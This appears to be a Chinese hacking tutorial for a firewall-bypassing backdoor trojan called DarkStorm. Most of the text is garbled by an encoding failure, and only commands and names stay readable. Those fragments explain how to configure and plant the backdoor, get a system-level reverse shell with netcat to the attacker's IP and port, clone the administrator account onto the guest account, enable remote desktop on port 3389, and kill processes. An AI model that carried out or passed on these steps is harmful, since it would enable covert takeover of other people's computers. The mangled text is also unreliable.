����ҪΪ��ҽ��ܵ�DarkStorm BePassFireWall BackDoor V1.2��һ��ɹ��ʼ��ߵķ����˿ڴ�����ǽ�ĺ��ų������¼��DBB�������Դ�99%�ķ���ǽ���ú��Ų����̲߳��뼼���������Լ��ߣ���ϵͳ���Է�����ʽ���أ�ӵ��systemȨ�ޣ�һ�����У����ѽ���ɾ����ͬʱ������Ҫ���ǣ����ڻ�û��ɱ�������ܹ���ɱ��������˵����������ĺ��ų����ˡ������������һ��������һ��DBB�Ķ��������ɣ�
һ�����ú���
��һ����Ȼ�ǰ��������ɲ��ݵ��ؼң���ʹ�ú���ǰ��������ѹ�����ڵ�config DarkStorm.exe�������ú��š�˫������config DarkStorm.exe������ͼ1��ʾ�����öԻ����ڣ�������ʾ����������ݡ���ʵ���ú���֧�ֲ��������þͿ�ֱ��ʹ�ã���ʱ��ʹ�ú��ŵ�Ĭ�����ã��������Ӷ˿���8888���ؼ�����NOIR����������DNScnsvc��
С��ʾ��DBB���ŷ������DarkStorm.exe��DarkStorm.dll��ɣ�������exe��DLL�ļ��ǿ��Ը����ģ����DZ���Ҫ�ij�ͬ�������֣����磬����exe�ļ�����Ϊ123.exe����ôdll�ļ�ҲҪ��Ӧ�ĸ���Ϊ123.dll��
��������
Ҫ���к��źܼ�ֻҪ��exe��dll�ļ��ϴ���Զ��������֮��ֱ������exe�ļ������ż��ɱ����ء�
С��ʾ��exe�ļ���dll�ļ�����һ��Ҫ�ŵ�system32�У���������ͬһ�ļ����¡�
��Ҷ�֪�������ںܶ�������������ڷ���ǽ����ģ�����ú������ӱܷ���ǽ�Ļ��۽��أ������Ҫ�÷������ӹ��ܡ�DBB��ͨ����̽�����ַ��������������ӵģ���֧��nc�������ӡ�
�����ڱ��ؼ������ʹ��nc�������ؼ������8888�˿ڣ�����������״̬������������� nc -l -p 8888��Ȼ������nc����Ŀ���������κ�һ������ǽ������TCP�˿ڣ�80/139/445.....���������ٿ�һ�������д��ڣ��������nc 220.202.242.101 139��Ȼ�����뼤�����NOIR:220.202.242.98:8888������220.202.242.101Ϊľ�������IP��ַ��NOIRΪ���������֣�220.202.242.98��8888Ϊ�������ӵ�IP��ַ��Ҳ���DZ���IP��ַ���˿ڡ�����������ӳɹ����ͻ��ڱ��ؼ�����еõ�Ŀ��������һ��ϵͳȨ��SHELL����ͼ2����
�������ɲ���
���ɹ���ȡ��Ŀ��������һ��ϵͳȨ��SHELL�͵����Ѿ����ո�̨���������ɱ��Ȩ�����˸�����ϲ���ǣ�DBB��ӵ��һЩ�dz�ʵ�õĿ��ƹ��ܡ�
1.�ʻ���¡
Ϊ���´��ܹ�˳������Ŀ��������һ����ַ����ǿ�¡һ��ϵͳȨ���ʻ��������ʹ��clone����Ϳ������ɿ�¡һ�������û��������ʽΪ��clone username clonename password�����У�username�DZ���¡���û����û�����һ����administrator��clonename����Ҫ��¡Ϊusername���û�����һ����guest��password����Ϊ��¡�û����õ����룬�32λ�����磬Ҫ��Guest��¡Ϊ����Ա�ʻ���������������Ϊsnow����ֻҪ�������clone administrator guest snow����ͼ3����
2.�����ն˷���
Զ���ն˷������˵����Ϊ�����Զ�̿��Ʒ�ʽ����ˣ����ɹ�����Ŀ���������������뷽�跨���������ؼ�������ն˷�����Ȼ˵����3389�ն˷���ķ����кܶ࣬�ɶ�����һ���Ѷȵġ��������ã����˸ú��ţ�ֻҪ��һ������Ϳ������ɿ���3389����������Ϊ��term port�����磺�������term 3389������ͼ4���������ͽ�����Ŀ�������Ķ��շ����ն˷���ͨѶ�˿�Ϊ3389���������������������Ч��
С��ʾ���ն˷���ֻ��Windows 2000���������ϰ汾��ӵ�С�
3.���̹���
��֪��Ŀ��������������Щ�����𣿺ܼ��������pslist�������Ϳ�����ʾ���������û����̺����Ӧ��pid�š���������ijһ���̵����У����������pskill pid����ʾ��pidָ���ǽ���ID�ţ���ͼ5����
���⣬��������Logoff��ע����ǰ�û�����Reboot������ϵͳ����Shutdown���ر�ϵͳ����Poweroff���رյ�Դ��������ɹ�ʹ�á�
�ġ���ɱ����
����������˸ú��ţ�����ͨ�����·�����ɾ������ע����༭������չ�������Ӽ���HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
Services���ҵ���ɾ�����Ӽ��µ�DNScnsvc������ͼ6��������������ϵͳ���ɡ������������Լ��趨�ģ���ɾ����ط��������Ӽ���
С��ʾ�����ؼ���������ܷ���SHELL��ϵͳ������ӵ�ж�������IP�����ļ���������⣬���ڸú���ʹ�õ�������������̽������̽�����Ա���������������������ڶԱ����IJ����У������ɹ��ġ�
��QQ���磺1360095750��